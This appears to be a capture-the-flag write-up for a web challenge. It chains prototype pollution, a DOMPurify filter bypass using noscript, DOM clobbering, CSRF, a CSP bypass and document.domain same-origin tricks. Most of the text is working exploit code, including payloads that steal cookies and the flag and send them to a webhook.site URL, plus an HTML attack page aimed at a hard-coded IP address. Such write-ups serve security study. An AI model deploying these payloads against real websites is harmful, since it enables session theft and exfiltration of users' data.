I inspired this challenge while i was playing a challenge by @53c0nd-2473.
- Overwrite Object object's getOwnPropertyNames with "nice feature" to bypass dompurify + trusted types.
{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
- Bypass custom filter with
noscript
tag. example:<noscript><img src="</noscript><img src=1 onerror=alert()">
- Steal cookies with using
debug.js
and set parent's name to cookies and do redirect with meta tag - Send
window.name
to your webhook.
var ppPayload = `{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}`;
var customFilterBypass = `
<noscript>
<img/id="
</noscript><img><iframe/srcdoc='HTMLINJ'></iframe><meta/http-equiv='refresh'/content='1;url=https://webhook.site/6-b79f993da3a' />
">
</noscript>`.replace(/\n/g,"").replace(/ /g,"").replace(/\t/g,"");
var domclobbering = `
<iframe srcdoc="NEXT" name="debugOptions"></iframe><link href="/ff" rel="stylesheet"><link href="/qqq" rel="stylesheet"><link href="/ffds" rel="stylesheet"><link href="/df" rel="stylesheet"><script src="/js/debug.js"></script>
`.replace(/"/g,""");
domclobbering = domclobbering.replace("NEXT",`
<iframe srcdoc="NEXT" name="0"></iframe>
`).replace(/"/g,"&quot;")
domclobbering = domclobbering.replace("NEXT",`
<br id="0" clear="parent"><font id="1" face="name"><object id="2" code="document"></object><input id="3" accept="cookie">
`.replace(/"/g,"&amp;quot;"));
customFilterBypass = customFilterBypass.replace("HTMLINJ",domclobbering).replace(/\n/g,"").replace(/ /g,"/");
console.log(`http://sosafewebsite.peykar.io:7070/?name=${encodeURIComponent(customFilterBypass)}&wow=${encodeURIComponent(ppPayload)}`);
- CSRF to add note
- Bypass CSP on notes website with putting script and html file in a same file.
alert();
`
<script src="/self">
</script>
`
- Make main website same-origin with note website with giving
document.domain=document.domain
as feature - Use main domain's fetch to grep the flag. Exploit:
<html>
<head>
</head>
<body>
<script>
window.target = {domain : "139.162.238.54", main : "http://139.162.238.54:9090",webhook:"https://webhook.site/-b79b-8005f993da3a"};
var status = window.name;
var t = 8;
function getIncludeScriptPayload(){
let payload = document.createElement("iframe");
payload.srcdoc = `<script src=${target.main}/note><\/script>`;
return payload.outerHTML;
}
if(status == "csrf_note_include_script"){
var form = document.createElement("form");
form.id = "csrfForm";
form.method = "POST";
form.action = target.main+"/note";
var inp = document.createElement("input");
var jspayload = `
document.domain="${target.domain}";
setTimeout(()=>{
parent.parent.opener.fetch("/flag",{method:"POST",headers:{"x-i-want":"flag"}}).then(r=>r.text()).then(r=>{
parent.parent.location="${target.webhook}?flag="+r;
});
},1000);
`.replace(/\n/g,"",/ /g,"");
inp.value = jspayload+";`"+getIncludeScriptPayload()+"`";
inp.name = "note";
form.appendChild(inp);
document.body.appendChild(form);
csrfForm.submit();
}
if(status == "start_attack"){
window.open("?","csrf_note_include_script");
document.location = `${target.main}?feature=document.domain=document.domain`
}
function startattack(){
window.open("?","start_attack");
}
if(status == "" || !isNaN(status)){
startattack();
}
</script>
<button onclick="startattack()">Attack</button>
</body>
</html>